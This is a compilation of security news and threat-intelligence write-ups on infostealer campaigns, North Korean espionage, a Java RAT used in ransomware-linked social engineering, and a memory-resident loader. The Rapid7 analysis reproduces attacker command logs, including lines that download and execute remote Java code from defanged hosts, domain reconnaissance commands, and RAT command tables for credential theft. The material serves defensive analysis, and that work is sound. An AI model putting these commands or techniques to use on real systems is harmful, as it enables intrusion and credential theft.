So long and thanks for all the fish: Peter Williams admits to selling unpatched iPhone bugs to a shady Russian broker.

The post US Defense Contractor Boss Sold Zero Days to Russia — Cops a Plea appeared first on Security Boulevard.

AdaptixC2, a legitimate and open red team tool used to assess an organization's security, is being repurposed by threat actors for use in their malicious campaigns. Threat researchers with Silent Push have linked the abuse of the technology back to a Russian-speaking bad actor who calls himself "RalfHacker."

The post Threat Actors Weaponizing Open Source AdaptixC2 Tied to Russian Underworld appeared first on Security Boulevard.

A new Vanta survey of 3,500 IT and business leaders reveals that 72% believe cybersecurity risks have never been higher due to AI. While 79% are using or planning to use AI agents to defend against threats, many admit their understanding lags behind adoption—highlighting the urgent need for stronger governance, risk, and compliance (GRC) frameworks for AI.

The post Survey Surfaces Greater Appreciation for AI Risks appeared first on Security Boulevard.

A critical security flaw in Microsoft's WSUS feature is being actively exploited in the wild by threat actors who could gain access into unpatched servers, remotely control networks, and use them to deliver malware or do other damage. Microsoft is urging organizations to apply a patch to their systems.

The post Critical Microsoft WSUS Security Flaw is Being Actively Exploited appeared first on Security Boulevard.

More than 3,000 malicious YouTube videos were used to distribute infostealer malware, according to a new report detailing the operation. Dubbed the “YouTube Ghost Network” by Check Point Research, the large-scale malware distribution operation used fake and compromised YouTube accounts to distribute infostealers like Rhadamanthys and Lumma, the report said. Most of the videos have now been removed, but the malware operation has been active at least since 2021. Game hacks and cheats and software cracks and piracy were the most targeted categories. “It is important to emphasize that the use of cracked software is illegal and that such versions frequently contain hidden malware,” Check Point said. The most viewed malicious videos targeted Adobe Photoshop, with 293,000 views, and FL Studio, with 147,000 views.

Compromised YouTube Accounts Used to Spread Infostealer Malware

Much of the YouTube Ghost Network consists of compromised YouTube accounts that are assigned specific operational roles, such as uploading malicious videos or liking and commenting to create a false sense of trust in a compromised account. “This role-based structure enables stealthier distribution, as banned accounts can be rapidly replaced without disrupting the overall operation,” the report said. The most targeted game from the “Game Hacks/Cheats” category was Roblox, with 380 million monthly active users and about 111.8 million daily active users. In the “Software Cracks/Piracy” category, Adobe products are the main targets, led by Photoshop and Lightroom. External links in the video posts typically redirect users to file-sharing services such as MediaFire, Dropbox, or Google Drive, or to phishing pages hosted on platforms like Google Sites, Blogspot, or Telegraph (telegra.ph). Those pages then contain links to download the malicious software, and shortened URLs are often used to hide the real destination of the external link. The description of the videos follows a typical structure, with a download link and shared password. Step-by-step instructions often advise users to temporarily disable Windows Defender to avoid “a false alert.” “Don’t worry – the archive is clean,” assures one post after telling potential victims to temporarily disable Windows Defender. “Defender may trigger a false alert due to the way Setup.exe works with installations.” In most cases, the malware distributed is an infostealer. Lumma was initially the most distributed malware before its disruption, followed by Rhadamanthys, and the StealC and Redline infostealers have also been observed.

Compromised YouTube Accounts Distributed Malicious Pirated Photoshop

The report detailed two compromised YouTube channels and accounts. The YouTube channel @Sound_Writer, with 9,690 subscribers, published videos that were mainly focused on cryptocurrency software and gaming. “Our analysis indicates that this account has been compromised for over a year, as evidenced by the appearance of malicious videos that differ significantly from the channel’s previous content,” Check Point said. The account @Afonesio1, with approximately 129,000 subscribers, was compromised between December 3, 2024, and January 5, 2025, and has since uploaded four videos to distribute malware. One of the account’s most viewed videos, with 291,155 views and 54 positive comments, “was used to lure unsuspecting viewers into downloading and executing a cracked version of Adobe Photoshop.” Within the video’s description was a community message link and the password required to decompress the password-protected archive. The post “received approximately 1,200 likes and numerous positive comments praising the effectiveness of the software solution,” Check Point said. The shortened link in the post redirected users to Dropbox, where the file could be downloaded The archive contained a file named Adobe.Photoshop.2024.v25.1.0.120.exe, which is a cracked version of Adobe Photoshop. “It remains unclear whether the positive comments originate from real users who inadvertently infected themselves or from ghost accounts promoting the malicious software with AI comments,” the report said. “The ongoing evolution of malware distribution methods demonstrates the remarkable adaptability and resourcefulness of threat actors in bypassing conventional security defenses,” Check Point concluded. “While email phishing remains a well-known and persistent threat, our research reveals that adversaries are increasingly shifting toward more sophisticated, platform-based strategies, most notably, the deployment of Ghost Networks. These networks leverage the trust inherent in legitimate accounts and the engagement mechanisms of popular platforms to orchestrate large-scale, persistent, and highly effective malware campaigns.”

The name said it all: DroneEXEHijackingLoader.dll.

That internal file name, buried in malicious code delivered to three European defense contractors, revealed what security researchers now believe represents North Korea's latest espionage campaign aimed at stealing drone technology as Pyongyang races to modernize its UAV arsenal.

The attacks, attributed to the notorious Lazarus APT group, targeted companies manufacturing unmanned aerial vehicle components and software between March and August 2025, according to ESET Research.

The timing proves significant. North Korean soldiers deployed to Russia during this period to support Moscow's war effort in Kursk, exposing Pyongyang's military to modern drone warfare firsthand. Intelligence analysts assess this battlefield experience likely reinforced North Korea's determination to accelerate its domestic UAV production capabilities.

Lazarus executed the intrusions through Operation DreamJob, a long-running social engineering campaign that dangles fake job offers at aerospace and defense sector employees. Targets received trojanized PDF readers alongside fabricated job descriptions, delivering malware disguised as legitimate hiring materials.

Also read: Operation Dream Job Continues, Uses Trojanized PuTTY SSH Client

The attackers compromised a metal engineering firm in southeastern Europe, an aircraft component manufacturer in central Europe, and a defense company also in central Europe. At least two victims maintain direct involvement in UAV technology development, with one producing critical drone components currently deployed in Ukraine.

Technical Evolution Maintains Effectiveness

The campaign deployed ScoringMathTea, a remote access trojan that grants attackers complete system control and has served as Lazarus's payload of choice for three years. This RAT supports approximately 40 commands enabling file manipulation, process management, system reconnaissance, and data exfiltration through encrypted channels.

Lazarus embedded its malicious code within trojanized open-source projects pulled from GitHub, including TightVNC Viewer, MuPDF reader, DirectX Wrappers, and plugins for Notepad++ and WinMerge. This technique provides enough variation to evade signature-based detection while maintaining operational consistency.

The group leveraged DLL side-loading, a technique where legitimate executables load malicious dynamic link libraries placed in unexpected system locations. The malware never appears unencrypted on disk, using AES-128 or ChaCha20 algorithms for obfuscation.

Reverse Engineering Through Cyberespionage

North Korea's current flagship reconnaissance drone, the Saetbyol-4, appears nearly identical to Northrop Grumman's RQ-4 Global Hawk. Its multipurpose combat drone, the Saetbyol-9, replicates the design of General Atomics' MQ-9 Reaper. Even the numerical designations mirror their American counterparts.

This copying extends beyond visual mimicry. Multiple campaigns affecting aerospace companies, including UAV technology specifically, have been attributed to North Korean APT groups in recent years. U.S. authorities formally linked several Lazarus-related groups to North Korean intelligence services.

Russia now reportedly assists North Korea in producing knockoff versions of Iranian-made Shahed suicide drones. Pyongyang also develops low-cost attack UAVs potentially destined for African and Middle Eastern export markets. Recent construction activity near North Korean aircraft factories suggests preparation for mass UAV production.

Persistent Methods Despite Public Exposure

Despite widespread media coverage of Operation DreamJob tactics, employee awareness in sensitive sectors remains insufficient to counter these social engineering approaches. The campaign's success rate indicates security training programs fail to adequately prepare personnel for sophisticated recruitment-themed attacks.

Also read: LinkedIn Job Scams Are the Latest Cyber Threat – Don’t Fall for Fake Recruiters

ESET researchers identified ScoringMathTea in previous attacks against companies in India, Poland, the United Kingdom, and Italy since January 2023. The RAT first appeared in VirusTotal submissions from Portugal and Germany in October 2022, disguised as Airbus-themed job offers.

Command and control infrastructure relies on compromised WordPress installations, with malicious server-side code typically stored within template or plugin directories. The attackers rotate through various hosting providers across multiple countries.

Security researchers attribute this activity to Lazarus with high confidence based on social engineering techniques, GitHub project trojanization methods, ScoringMathTea deployment, and targeting patterns consistent with previous Operation DreamJob campaigns. Organizations active in UAV development should anticipate continued targeting as North Korea pursues indigenous drone capabilities through cyber-enabled industrial espionage.

Also read: Lazarus Group Targets Cryptocurrency Job Seekers on LinkedIn

Executive Summary

There has been a significant decrease in social engineering attacks linked to the Black Basta ransomware group since late December 2024. This lapse also included the leaked Black Basta chat logs in February 2025, indicating internal conflict within the group. Despite this, Rapid7 has observed sustained social engineering attacks. Evidence now suggests that BlackSuit affiliates have either adopted Black Basta’s strategy or absorbed members of the group. The developer(s) of a previously identified Java malware family, distributed during social engineering attacks, have now been assessed as likely initial access brokers, having potentially provided historical access for Black Basta and/or FIN7 affiliates.

Overview

The first stage of the attack remains the same. The operator will flood targeted users with a high volume of emails, to the order of thousands per hour. This is often accomplished by signing the target user’s email up to many different publicly available mailing lists at once, effectively creating a denial of service attack when each service sends a welcome email. This technique is commonly known as an email bomb.

Following the email bomb, the strategy then splits between operators, though they all ultimately reach out to impacted users pretending to be a member of the targeted organization’s help desk. The majority of operators still perform this step via Microsoft Teams using either a default Azure/Entra tenant (i.e., email account ends with onmicrosoft[.]com) or their own custom domain. In rare cases however, operators, particularly those affiliated with BlackSuit, may forgo Microsoft Teams in favor of calling the targeted users directly with a spoofed number. This strategy, if successful, allows them to circumvent the cloud logging that would be recorded otherwise. For the first time, an explanation of the process written by Black Basta’s leader is also available for a summary of the process, in the context of explaining the attack to a new affiliate:

If the affiliate is able to gain the user’s confidence, they will still primarily attempt to gain access to the user’s asset — and thereby the corporate network — via Quick Assist. Quick Assist is a built-in Windows utility that allows a user to easily grant remote access to their computer to a third party. The utility has been widely abused for social engineering attacks, a trend which continues. BlackSuit affiliates in particular may also direct the user to a malicious domain that hosts a fake Quick Assist login page, for the purpose of harvesting their credentials.

In cases where the affiliate is unable to get Quick Assist to work, they will still cycle through a variety of other popular remote access tools (e.g., AnyDesk, ScreenConnect), and if that still doesn’t work, they may simply hang up on the user and move on to the next target.

Black Basta had at least one caller template/script for this purpose:

Quickly obtaining reliable access to the target network is still the top priority in the early stages of the attack, typically facilitated by stealing the targeted user’s credentials. In the past this has been achieved, for example, via a QR code sent to the target user via Microsoft Teams or the download and execution of malware which creates a fake Windows authentication prompt.

In some cases the operator who makes the initial call may also coerce the target user to provide an MFA code while still on the phone. Historically, operators will also attempt to steal VPN configuration files once remote access is established, which can allow them to authenticate directly to the network if the compromised user account is not remediated.

After the affiliate has successfully gained access they will typically transfer and execute malware on the compromised system. The specific malware differs per operator and typically marks the stage in which the access is passed from the caller to an operator within the group who specializes in what they refer to as “pentesting.” To facilitate the access, the operator who calls typically coordinates with the “pentester” to increase the chances of success. At this point in the attack the affiliate who called the user has already hung up under the guise of having fixed the spam problem, and the “pentester” then begins to enumerate the environment. Rapid7 has observed AS-REP and Kerberoasting attacks to be commonly attempted along with Active Directory Certificate Services (ADCS) abuse and other types of brute force password attacks.

Technical Analysis

After initial access has been achieved, the follow-on malware payloads that are downloaded to the compromised system and executed differ, per operator.

Java RAT

A large volume of social engineering incidents handled by Rapid7 have resulted in a Java RAT being downloaded and executed. This tactic was first observed by Rapid7 during October of 2024, and initially reported on in December 2024 in relation to the payload identity.jar. The first samples of the Java RAT observed by Rapid7 only utilized Microsoft OneDrive with optional proxy servers (e.g., SOCKS5) for a more direct C2 connection. The configuration was left in plain text, and did not contain any functionality to dynamically update or encrypt the configuration, primarily functioning only as a RAT via PowerShell session commands.

In the past 6+ months, development of the Java malware payload has continued to add/change numerous features. The Java malware now abuses cloud-based file hosting services provided by both Google and Microsoft to proxy commands through the respective cloud service provider’s (CSP) servers. Over time, the malware developer has shifted away from direct proxy connections (i.e., the config option is left blank or not present), towards OneDrive and Google Sheets, and most recently, towards simply using Google Drive. The logic of the RAT is obfuscated using various types of junk code, control flow obfuscation, and string obfuscation in an attempt to impede analysis.

The Java RAT and other payloads are distributed within an archive, the link for which is most often sent to the target user via a pastebin[.]com link. In cases as recent as May of 2025, Rapid7 has observed that the archives are still being publicly hosted on potentially compromised SharePoint instances. The archive and the payloads within are named to fit the initial social engineering lure. For example, in a recent incident, the archive was named Email-Focus-Tool.zip, likely to help prevent suspicion by the targeted user during the attack. The archive contains a .jar file (the Java RAT), a copy of required JDK dependencies contained within a child folder, and at least one .lnk file intended to make the malware easy to execute.

The archive is most often extracted to the staging directory C:\ProgramData\ prior to execution. In at least one case, Rapid7 has also observed the operator who initiated the attack outputting system enumeration data to a plaintext file in the same directory, a technique commonly used in the past by Black Basta. Historically, this is information that they share during the initial stages of the attack to assess the network and the type of defenses they may have to deal with. For example, shown above, the operator who initially accessed the compromised asset spawned a command prompt and redirected the output of the ipconfig /all and tasklist commands to the file log.txt.

Most recent versions of the Java RAT have the capability to use Google Sheets to dynamically update the stored C2 configuration, which includes a Google spreadsheet ID (SSID), proxy server IPv4 addresses, application credentials (OneDrive), and/or service account credentials (Google Drive). At least one of the Google Spreadsheets used in this way was observed by Rapid7 to have been taken down by Google, which highlights the potential unreliability of using certain cloud services as a malware traffic proxy.

One of the first actions taken by the malware on launch is to check for an existing configuration in the user’s registry, and if it is not already present, the copy included within the .jar payload, contained within the file config.json, is written there. All samples analyzed by Rapid7 did not have debugging messages removed, allowing them to be viewed by simply executing the .jar file in a console window, as all the debugging messages are written to stdout.

The registry value name(s) and content for the stored config are both base64 encoded (e.g., HKCU\SOFTWARE\FENokuuTCyVq\JJSUP0CEcUw9PENaNduhsA==), with the decoded configuration content being encrypted using AES-256-ECB. The encryption key is derived from a seed that is stored as a 16 byte string within a file named ek (encryption key), that is contained within the .jar archive. The registry key name, a randomized alphabetic string, is hard coded and stored in a similar manner within the file r_path (registry path). The malware creates a SHA256 hash of the encryption key seed string, and the first 32 bytes of the SHA256 hash are then used as the AES-256-ECB key to encrypt and decrypt the malware’s configuration. Every sample analyzed by Rapid7 contained a unique key seed, though a particular sample is often distributed (within the related archive) to multiple targets for an extended period of time, often around a couple weeks.

After checking and loading the configuration from the registry, local resource, or updated configuration, the RAT will then establish at least one PowerShell session.

The stdin and stdout for the PowerShell console are used to process remote commands. The commands sent to the Java RAT are proxied through the respective CSP by the malware creating two specific files within the cloud drive. The name of the files all contain the UUID of the infected asset, which is retrieved at the malware’s startup. There are two prefixes added onto the primary communication files, cf_ and rf_ which contextually appear to stand for create file and receive file, respectively. These two files correspond to the standard output (stdin) and standard input (stdin) of the PowerShell console. The malware uses the input file in two major ways. If the cf_ file (stdin) starts with a specific command string, the content following it will be processed by the malware to execute functionality implemented by the malware developer.

Otherwise, the content will be executed as a regular PowerShell command.

Command	Function
send	Send a file from the operator’s machine to the infected machine.
recive	Upload a file from the infected machine to the relevant cloud drive. The command string includes a typo made by the developer.
extract	Extract a specified file archive.
loginform	Present a fake login prompt to the user. Entered credentials are validated locally, and if correct, are uploaded to the operator’s machine through the cloud drive. The username must be specified by the operator.
newconfig	Replace the existing configuration with one retrieved from Google Sheets.
checkconfig	Check Google Sheets using the SSID to see if an update is available.
startsocks5	Initiate a Socks5 proxy tunnel using python.
steal	Attempt to decrypt and steal stored browser database information. (e.g., credentials)
screen	Given a supplied URL, download and execute a Java class in memory.

Table 1. Command key for the Java RAT.

The previously seen credential harvesting payload, identity.jar, has now also been integrated into the Java RAT, and instead of writing the entered credentials to a randomly named file within the working directory, the RAT sends it to the cloud drive C2 file that has been designated to the compromised host. This functionality is executed by the operator by sending the loginform (the Java class is abbreviated as “Lf”) command to the RAT via the cloud drive file. After decompiling and deobfuscating the Java code that the module consists of, it can be cleaned up, recompiled, and executed as a standalone program. This allows us to see that the appearance of the module to the targeted user is the same, including the fake “Windows Security” title. A review of the code indicates that it has not changed in any other significant way. The harvester still forces the active window on top and will not let the user close the window without entering their password or forcibly terminating the process.

As a result of the cloud service credentials being stored within the malware payload, and that, for example, Google Drive stores a revision history for every created file by default, it is possible to view the entire history of commands sent to each infected asset, including stdin and stdout.
This gives a unique in console view of what the threat actor saw while they were hands-on-keyboard and executing commands. Command log snippets can be seen below, with identifying information redacted. Once access is established, the operator nearly always verifies the user’s name with the dir command and then uses this information to execute the loginform command, as the malware does not retrieve the executing user’s name on its own.

Infected Host GUID: 4C4C4544-0038-4610-8036-B6C04F394733 2025-04-24T16:53:34.038Z: dir c:\users\ 2025-04-24T16:54:47.967Z: loginform <username> 3 2025-04-24T18:40:36.584Z: net time 2025-04-24T18:42:54.426Z: whoami 2025-04-24T18:43:48.284Z: net user <username> /domain 2025-04-24T18:48:35.089Z: hostname 2025-04-24T18:49:57.182Z: net group "Domain Computers" /domain 2025-04-24T18:50:56.578Z: net time 2025-04-24T19:17:14.259Z: ipconfig /all 2025-04-24T19:19:44.442Z: hostname

Infected Host GUID: 594045B3-008B-4106-8FF4-B850DF6C76D0 2025-04-24T17:20:09.896Z: dir c:\users\ 2025-04-24T17:20:58.179Z: loginform <username> 3 2025-04-24T17:36:52.542Z: wmic qfe list brief 2025-04-24T17:40:13.454Z: net time 2025-04-24T17:41:26.860Z: ping -n 2 <domain_controller_hostname> 2025-04-24T17:49:08.598Z: net group "Domain Computers" /domain > c:\users\public\001.txt

In some cases, Rapid7 has observed a command log gap ranging from around 4 to 12 days, beginning after the RAT is successfully executed and the user’s credentials have been stolen. In some cases an SSH tunnel is also established before activity stops. This type of behavior indicates that the threat actor may not be intending to use the access for themselves, but rather sell it to another group that specializes in fully compromising the network towards various ends (e.g., data theft, extortion, ransomware). Rapid7 has also observed the access being used to test new malware payloads and functionality, rather than progress the compromise within the targeted networks.

Qemu

In a smaller volume of incidents handled by Rapid7, operators have been observed sending the user a Google Drive link to download a zip archive containing QEMU (Quick Emulator) and its dependencies, including a custom made .qcow2 (QEMU Copy-On-Write version 2) virtual disk image. The image contains a Windows 7 Ultimate virtual machine (VM) configured to automatically logon and execute a RunOnce registry key that launches a ScreenConnect installer. In most cases a link to a fake Quick Assist login page (credential harvester) was also delivered to the targeted user by proxy via a self-destructing link service such as 1ty[.]me alongside the Google Drive zip archive link.

Once the remote session is established in this way, the VM also contains a copy of QDoor, Rust malware that functions as a C2 proxy, which allows the the threat actors to tunnel C2 traffic through a proxy to the VM, on the infected machine in the target user’s environment. In all cases handled by Rapid7, the QEMU executable was renamed (e.g., w.exe/svvhost.exe), and, as the emulator of the VM, it is the source on the infected host machine for all network connections resulting from processes running inside the VM. QDoor malware has been attributed to the BlackSuit ransomware group by ConnectWise.

In more recent cases, Rapid7 has observed the BlackSuit affiliates distributing a much smaller (64MB vs. 8.6GB) .qcow2 image that contains TinyCore Linux. When the image is loaded by QEMU, the bootlocal[.]sh script that is executed upon startup of the TinyCore OS has been set by the threat actors to sleep unless a successful ping is made to one of their servers. Once the ping is successful, an ELF file, 123.out is executed which attempts to connect to a C2 server.

Within the command log of the VM image, .ash_history, a wget command is also present which indicates the external server that the 123.out file was originally downloaded to the VM from.

In an alternate tc.qcow2 payload observed by Rapid7, the TinyCore VM boot script will unconditionally execute two ELF files, nossl and ssl. These ELF payloads function as multi-threaded socks proxies, where the ssl copy uses the OpenSSL library to encrypt traffic and ssl sends traffic in plaintext. In both cases, the ELF payloads send registration information to the C2 proxy server on port 53, which is typically used for DNS.

As shown below from the Black Basta chat leaks, BlackSuit has connections with the group, so the adaptation of their typical spear phishing attacks towards these types of social engineering attacks for initial access is unsurprising.

Malware Testing

After migrating the Java RAT’s functionality primarily to Google Drive, the threat actor developing the malware also began including the service account they use to test the malware within their own lab environment. The most recent versions of the RAT now also have the command screen which can download and execute a new Java class in memory. The threat actor first tested this in their own lab before trying it in infected devices that they had gained access to, as seen in the command logs below. Despite the name of the command and the name of the Java class that the test payload has (Screenshot), the payloads have varying functionality, but are generally intended to dynamically add new functionality to the RAT. The first test payload observed loads the Java class Screenshot, which then downloads a shellcode blob via a hard coded URL, and injects it into a new java.exe process using the WINAPI calls VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread.

The analyzed test shellcode payload would then perform local PE injection for an embedded Rust PE using NTAPI calls, which for the purposes of the test appears to only spawn a confirmation message box. The Rust PE has an original filename of testapp.exe, a PDB named testapp.pdb, and was originally compiled on 2025-04-10T15:45:28Z. Notably, the Rust PE did have the Windows Graphics Device Interface (GDI) library and several related function imports as dependencies, which could be used to access or manipulate the screen, but did not appear to be fully implemented yet.

The screen command was then successfully used several times in compromised environments, though for different reasons. In one case the operator simply used it as a way to check the external IP address of the infected host. The command log below shows the threat actor testing the screen command for the first recorded time, using the payload with the embedded Rust PE, within their lab, shortly before starting a new spamming/social engineering attack run (during which they would distribute several copies of the malware).

Input@2025-04-23T17:12:32.203Z: screen hxxps://tesets[.]live/download/javacode.txt Output@2025-04-23T17-13-02.754Z: start shellcode done

In compromised environments however, the functionality was only observed in use as an external IP checking utility per the following command log.

Input@2025-05-07T17:36:59.102Z: screen hxxps://andrewjboyd[.]com/file/jc3_old_version.txt Output@2025-05-07T17-37-05.261Z: start shellcode done Input@2025-05-07T17:38:30.923Z: type c:\users\public\info.txt Output@2025-05-07T17-38-40.100Z: <redacted_public_ipv4_address_for_compromised_system>

Rapid7 observed at least one other Rust malware payload, updater.exe being used by the threat actor, which appeared to be a custom loader for the SSH utility, containing the PDB name rust_serverless_killer.pdb. As many of the compromises facilitated by the social engineering attacks have resulted in SSH reverse tunnels being established to provide access, the loader is likely an attempt to evade detections targeting SSH commands by obscuring the related metadata. The SSH executable being loaded has the same functionality however, and as a result the command line arguments that must be passed remain the same.

The threat actor tested a variety of functionality for the Java RAT within their test lab. This includes the zipped python RAT the group would historically upload, decompress and execute (facilitated by the built in send and extract commands), or distribute instead of the Java RAT. The python RAT has a similar command menu to that of the Java RAT. The python RAT has also been previously analyzed by Gdata with similar findings, who refer to it as Anubis (likely based on the source code) and attribute the malware to the FIN7 group.

InputStart@2025-03-28T13:31:01.430Z: checkconfig InputStart@2025-04-01T15:21:49.251Z: recive c:\programdata\video\log.txt InputStart@2025-04-03T17:01:26.653Z: send C:\Users\Public\Libraries\nature.zip extract C:\Users\Public\Libraries\nature.zip\qwerty dir c:\users\ InputStart@2025-03-28T14:01:17.825Z: checkconfig newconfig InputStart@2025-04-01T13:16:18.589Z: send C:\Users\Public\Libraries\nature.zip startsocks5 C:\Users\Public\Libraries\nature\debug.exe C:\Users\Public\Libraries\nature\test.py
Several commands executed in the threat actor’s test lab can be seen above, where the python based payload was delivered via the Java RAT. In several past incidents handled by Rapid7 the name of initial payload archives containing python malware was Cloud_Email_Switch.zip and the script was named conf.py, where the script was executed via a copy of pythonw.exe that had its metadata stripped. The threat actor appears to have now moved to using the Java RAT primarily instead of the python version, although the Java payload retains the functionality to upload, extract, and execute python scripts.

Command	Function
killexit	Immediately terminates the process.
ip	Creates a UDP socket targeting Google's DNS server (8.8.8[.]8) and connects to it to retrieve the machine’s local IP address.
‘cd ‘	Change the working directory to one specified by the C2.
‘gt ‘	Steal a specified file or directory. Reads and sends the content straight to the C2. If the target is a directory, the script will archive it into a zip file first.
‘up ‘	Upload a file sent by the C2, to the infected host, to a specified file path.
env	If the C2 specifies a 'list' command, the RAT returns all the existing environmental variables. Otherwise returns a specific variable chosen by the C2.
!cf!	Create/update a key (named via hard coded string) in the user’s registry using configuration data sent by the C2. Allows for the malware’s configuration to be dynamically updated.
!tcf!	Test C2 addresses supplied by the current C2 in a new config, by creating a TCP socket to attempt to connect to the new address(es) supplied. Returns the result to current C2. Doesn’t update the config.
default	If one of the above commands is not present, create a child console process (cmd.exe) to execute the contents received from the C2 and return stdout.

Table 2. Command key for the python RAT.

Among the output of the commands the threat actor ran in their test lab, we can also see a listing of their Downloads directory. The output shows that they have likely been developing Rust malware since at least 2024-09-21. The test lab is most likely also the environment in which they compiled testapp.exe as Rust executables contain cargo references which include the user’s name, for example: C:\Users\User\.cargo\registry\src\<truncated>. In contrast, updater.exe, the Rust SSH loader previously mentioned, references the user lucak.

Finally, while setting up the testing environment, the threat actor made changes to several Google Drive files from what appears to be a personal Gmail account: palomo************[@]gmail[.]com. These changes were visible as numerous versions of the Java RAT were distributed with the threat actor’s test lab Google Drive service account credentials included.

Mitigation Guidance

Rapid7 recommends taking the following precautions to limit exposure to these types of attacks:

Restrict the ability for external users to contact users via Microsoft Teams to the greatest extent possible. This can be done for example by blocking all external domains or creating a white/black list. Microsoft Teams will allow all external requests by default. For more information, see this reference.
Standardize remote management tools within the environment. For unapproved tools, block known hashes and domains to prevent usage. Hash blocking can be done, for example, via Windows AppLocker or an endpoint protection solution.
Provide user awareness training regarding the social engineering campaign. Familiarize users with official help desk and support procedures to enable them to spot and report suspicious requests.
Standardize VPN access. Traffic from known low cost VPN solutions should be blocked at a firewall level if there is no business use case.
Require Multi-Factor Authentication (MFA) across the environment. Single factor authentication facilitates a large number of compromises. For example, If an attacker steals a user’s credentials and acquires the network’s VPN configuration, no MFA on the VPN allows them to easily access the environment.
Regularly update software and firmware. Ransomware groups like Black Basta are known to purchase exploits for initial access.

Rapid7 Customers

InsightIDR, Managed Detection and Response, and Managed Threat Complete customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this activity:

Detections
Suspicious Chat Request - Potential Social Engineering Attempt
Initial Access - Potential Social Engineering Session Initiated Following Chat Request
Attacker Technique - Base64 String Added to HKCU Registry Key
Suspicious Process - LNK Executes PowerShell via JAR
Suspicious Process - QEMU Loads Disk From Staging Directory
Credential Access - Steal or Forge Kerberos tickets
Anomaly Detection - Failed AS-REP Roasting Attack
Non-Approved Application - Remote Management and Monitoring (RMM) Tools

MITRE ATT&CK Techniques

Tactic	Technique	Procedure
Reconnaissance	T1591: Gather Victim Org Information	Operators utilize publicly available information to identify target contact details and financial information.
Resource Development	T1587.001: Develop Capabilities: Malware	The threat actors are actively developing new malware to distribute.
Impact	T1498: Network Denial of Service	The threat actors overwhelm email protection solutions with spam.
Impact	T1486: Data Encrypted for Impact	The threat actors historically either deploy ransomware after compromising a network, or sell the access to a ransomware group.
Initial Access	T1566.004: Phishing: Spearphishing Voice	The threat actors call impacted users and pretend to be a member of the target organization’s IT team to gain remote access.
Defense Evasion	T1140: Deobfuscate/Decode Files or Information	The threat actors decrypt some zip archive payloads with a password, onto infected hosts.
Defense Evasion	T1055.002: Process Injection: Portable Executable Injection	Some payloads executed by the threat actors utilize local PE injection.
Defense Evasion	T1620: Reflective Code Loading	Some payloads executed by the threat actors load and execute shellcode.
Credential Access	T1649: Steal or Forge Authentication Certificates	The threat actors have abused ADCS services to acquire certificates.
Credential Access	T1056.001: Input Capture: Keylogging	The threat actors run an executable that can harvest the user’s credentials.
Credential Access	T1558.003: Steal or Forge Kerberos Tickets: Kerberoasting	The threat actors have performed Kerberoasting after gaining initial access.
Credential Access	T1558.004: Steal or Forge Kerberos Tickets: AS-REP Roasting	The threat actors have performed AS-REP roasting attacks after gaining initial access.
Discovery	T1033: System Owner/User Discovery	The threat actors enumerate asset and user information within the environment after gaining access.
Command and Control	T1572: Protocol Tunneling	The threat actors use SSH reverse tunnels to provide/proxy remote access.
Command and Control	T1219: Remote Access Software	The threat actors have used QuickAssist, AnyDesk, ScreenConnect, TeamViewer, Level, and more, to facilitate remote access.

Indicators of Compromise

All indicators of compromise are available at the Rapid7 GitHub repository.

Co-authored by Anna Širokova and Ivan Feigl

Executive summary

Rapid7 has been tracking a malware campaign that uses fake software installers disguised as popular apps like VPN and QQBrowser—to deliver Winos v4.0, a hard-to-detect malware that runs entirely in memory and gives attackers remote access.

The campaign was first spotted during a February 2025 MDR investigation. Since then, we’ve seen more samples using the same infection method—a multi-layered setup we call the Catena loader. Catena uses embedded shellcode and configuration switching logic to stage payloads like Winos v4.0 entirely in memory, evading traditional antivirus tools.

Once installed, it quietly connects to attacker-controlled servers—mostly hosted in Hong Kong—to receive follow-up instructions or additional malware. While we’ve seen no signs of widespread targeting, the operation appears focused on Chinese-speaking environments and shows signs of careful, long-term planning by a capable threat group.

Rapid7 has deployed detections for this activity and continues to monitor for new variants. Indicators and analysis related to this campaign are available in Rapid7 Intelligence Hub.

Introduction

This blog covers a malware campaign tracked by Rapid7 that uses trojanized NSIS installers to deploy Winos v4.0, a stealthy, memory-resident stager. The first sample was flagged during a February 2025 MDR investigation. Following that case, we identified additional related samples through threat hunting and malware analysis.

All observed samples relied on NSIS installers bundled with signed decoy apps, shellcode embedded in `.ini` files, and reflective DLL injection to quietly maintain persistence and avoid detection. We refer to this full infection chain as Catena, due to its modular, chain-like structure.

The campaign has so far been active throughout 2025, showing a consistent infection chain with some tactical adjustments—pointing to a capable and adaptive threat actor.

In this report, we start with a brief recap of the February 2025 MDR incident, which was also covered by other researchers. We then focus on newer samples found later in 2025 that follow the same core infection chain but introduce changes in delivery, tooling, and evasion—highlighting how the campaign continues to evolve.

How it started: QQBrowser Installer in MDR Case

In February 2025, Rapid7’s MDR team detected suspicious activity on a customer asset involving a trojanized NSIS installer masquerading as QQBrowser installer `QQBrowser_Setup_x64.exe`. While the file initially appeared legitimate, further analysis revealed it delivered malware via a multi-stage, memory-resident loader chain. Upon execution, the installer created an Axialis directory under %APPDATA% and dropped several files:

• `Axialis.vbs` – a VBScript launcher
• `Axialis.ps1` – a PowerShell-based loader
  `Axialis.dll` – a malicious DLL
• `Config.ini` and `Config2.ini` – binary configuration files containing shellcode and embedded payloads
• A desktop shortcut and the original QQBrowser setup binary used for deception

Upon execution, the malware follows this chain shown below.

During runtime analysis, the `Axialis.dll` loader creates the mutex `VJANCAVESU` via the `CreateMutexA` API. If the mutex exists, it loads `Config2.ini`; if not, it loads `Config.ini`.

This behavior has been described by other researchers, who observed similar configuration switching logic in the DeepSeek campaigns — where the selected payload depended on the infection state. Both `.ini` files contain shellcode and embedded payload DLLs, all loaded and executed reflectively in memory.

Rapid7 analysis confirmed that the shellcode in `Config.ini` was built using the open-source sRDI loader.

The malware communicates with hardcoded command-and-control (C2) infrastructure over TCP port 18856 and HTTPS port 443.

Persistence is achieved through a combination of process monitoring and scheduled task registration. The embedded DLL in `Config.ini` created and executed  `Monitor.bat`, which continuously checked for malware processes and relaunched them if terminated.  ​​To ensure persistence, the malware dropped `updated.ps1` and `PolicyManagement.xml`, which are used to register a scheduled task that re-executes the VBS loader `Decision.vbs` via `wscript.exe`.

